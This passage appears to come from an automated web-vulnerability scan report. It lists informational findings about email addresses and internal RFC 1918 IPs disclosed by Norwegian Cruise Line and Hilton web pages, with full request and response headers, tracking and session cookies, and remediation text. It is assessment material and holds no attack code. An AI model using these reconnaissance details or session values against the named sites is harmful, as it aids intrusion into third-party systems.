<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<a class='email' href='mailto:CasinoInquiries@ncl.com'>
CasinoInquiries@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:successatsea@ncl.com'>
successatsea@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:accessdesk@ncl.com'>
accessdesk@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:latclerical@ncl.com'>
latclerical@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:mediainquiries@ncl.com'>
mediainquiries@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:premiumair@ncl.com'>
premiumair@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:ncladmin@ncl.com'>
ncladmin@ncl.com </a>
...[SNIP]...
<a class='email' href='mailto:ncl@theweddingexperience.com'>
ncl@theweddingexperience.com </a>
...[SNIP]...
20.273. http://www2.ncl.com/about/environmental-commitment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/environmental-commitment

Issue detail

The following email address was disclosed in the response:

Request

GET /about/environmental-commitment HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:33:33 +0000
ETag: "1317638013-1"
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 47797

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<a href="mailto:publicrelations@ncl.com">publicrelations@ncl.com</a>
...[SNIP]...
20.274. http://www2.ncl.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /faq

Issue detail

The following email address was disclosed in the response:

Request

GET /faq HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645036-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Content-Length: 83104

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
our Access Desk. In order to make your cruise experience as enjoyable as possible and so that we can try to meet your specific needs, call 1-866-584-9756 (voice), fax (305) 468-2171, send an email to accessdesk@ncl.com or have your travel agent contact us.
<br/>
...[SNIP]...
<a href="mailto:accessdesk@ncl.com">
...[SNIP]...
20.275. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/bon-voyage-gifts

Issue detail

The following email address was disclosed in the response:

Request

GET /freestyle-cruise/bon-voyage-gifts HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317637516-1"
Last-Modified: Mon, 03 Oct 2011 10:25:16 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Content-Length: 60158

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<a href="mailto:groupevent@ncl.com">groupevent@ncl.com</a>
...[SNIP]...
20.276. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/casinos-at-sea/overview

Issue detail

The following email address was disclosed in the response:

Request

GET /freestyle-cruise/casinos-at-sea/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 43284

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<a href="mailto:CasinoInquiries@ncl.com">CasinoInquiries@ncl.com</a>
...[SNIP]...
20.277. http://www2.ncl.com/freestyle-cruise/golf/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/golf/overview

Issue detail

The following email address was disclosed in the response:

Request

GET /freestyle-cruise/golf/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633060-1"
Last-Modified: Mon, 03 Oct 2011 09:11:00 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Content-Length: 44665

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<a href="mailto:Golf@ncl.com">Golf@ncl.com</a>
...[SNIP]...
20.278. http://www2.ncl.com/sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.1.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646081809-New%7C1320238081809%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Oct 2011 22:30:41 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 615144
Cache-Control: max-age=26729
Expires: Mon, 03 Oct 2011 20:13:10 GMT
Date: Mon, 03 Oct 2011 12:47:41 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
20.279. http://www2.ncl.com/sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/cruise-destinations
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 02 Oct 2011 19:31:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 639880
Cache-Control: max-age=51103
Expires: Tue, 04 Oct 2011 03:02:59 GMT
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
20.280. http://www2.ncl.com/sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Oct 2011 22:30:21 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 624082
Cache-Control: max-age=26594
Expires: Mon, 03 Oct 2011 20:10:04 GMT
Date: Mon, 03 Oct 2011 12:46:50 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
20.281. http://www2.ncl.com/sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js HTTP/1.1
Host: www2.ncl.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Cookie=R1788641230; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 02 Oct 2011 19:30:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 615144
Cache-Control: max-age=27988
Expires: Mon, 03 Oct 2011 21:09:49 GMT
Date: Mon, 03 Oct 2011 13:23:21 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
20.282. http://www2.ncl.com/sites/default/files/js/js_fdd3c7be863ac5dd808fad0ba5949c4a.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_fdd3c7be863ac5dd808fad0ba5949c4a.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sites/default/files/js/js_fdd3c7be863ac5dd808fad0ba5949c4a.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/ncl_inside_scoop
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646086034-New%7C1320238086034%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.2.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); seen_modal=1; Cookie=R4252675302; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Oct 2011 22:32:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Length: 105657
Content-Type: application/x-javascript
Cache-Control: max-age=27158
Expires: Mon, 03 Oct 2011 20:20:27 GMT
Date: Mon, 03 Oct 2011 12:47:49 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
20.283. http://www3.hilton.com/en_US/hi/brand/popup/preExistingCertificate.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/brand/popup/preExistingCertificate.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en_US/hi/brand/popup/preExistingCertificate.htm HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:24 GMT
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:01:34 GMT
Content-Length: 8844
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<a href="mailto:hhonors@hilton.com">hhonors@hilton.com</a>
...[SNIP]...
<a href="mailto:AsiaHHonors@hilton.com">AsiaHHonors@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsjp@hrwtokyo.hilton.co.jp">hhonorsjp@hrwtokyo.hilton.co.jp</a>
...[SNIP]...
<a href="mailto:glasgowhhonors@hilton.com">glasgowhhonors@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsdk@hilton.com">hhonorsdk@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsfi@hilton.com">hhonorsfi@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsfr@hilton.com">hhonorsfr@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsde@hilton.com">hhonorsde@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsita@hilton.com">hhonorsita@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsnl@hilton.com">hhonorsnl@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsno@hilton.com">hhonorsno@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorses@hilton.com">hhonorses@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorsse@hilton.com">hhonorsse@hilton.com</a>
...[SNIP]...
<a href="mailto:hhonorstr@hilton.com">hhonorstr@hilton.com</a>
...[SNIP]...
<a href="mailto:MexicoHHonors@hilton.com">MexicoHHonors@hilton.com</a>
...[SNIP]...
20.284. http://www3.hilton.com/skins/common/js_comp/r1core.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /skins/common/js_comp/r1core.comp.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /skins/common/js_comp/r1core.comp.min.js HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:38 GMT
ETag: "2fff0-716dd180"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 196592
Cache-Control: max-age=45183
Expires: Tue, 04 Oct 2011 01:25:58 GMT
Date: Mon, 03 Oct 2011 12:52:55 GMT
Connection: close

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Copyright (c) 2007 cody lindley
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and G
...[SNIP]...
20.285. http://www3.hilton.com/skins/common/js_comp/tracking.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /skins/common/js_comp/tracking.comp.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /skins/common/js_comp/tracking.comp.min.js HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:39 GMT
ETag: "972c-717d13c0"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 38700
Cache-Control: max-age=48576
Expires: Tue, 04 Oct 2011 02:22:31 GMT
Date: Mon, 03 Oct 2011 12:52:55 GMT
Connection: close

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Copyright (c) 2007 cody lindley
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and G
...[SNIP]...
20.286. http://www3.hilton.com/skins/en_US/js_comp/search.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /skins/en_US/js_comp/search.comp.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /skins/en_US/js_comp/search.comp.min.js HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:42 GMT
ETag: "f39f-71aada80"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 62367
Cache-Control: max-age=44921
Expires: Tue, 04 Oct 2011 01:21:36 GMT
Date: Mon, 03 Oct 2011 12:52:55 GMT
Connection: close

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Copyright (c) 2007 cody lindley
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and G
...[SNIP]...
21. Private IP addresses disclosed  previous  next
There are 62 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

21.1. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/loaders/indicator_white_large.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_white_large.gif HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
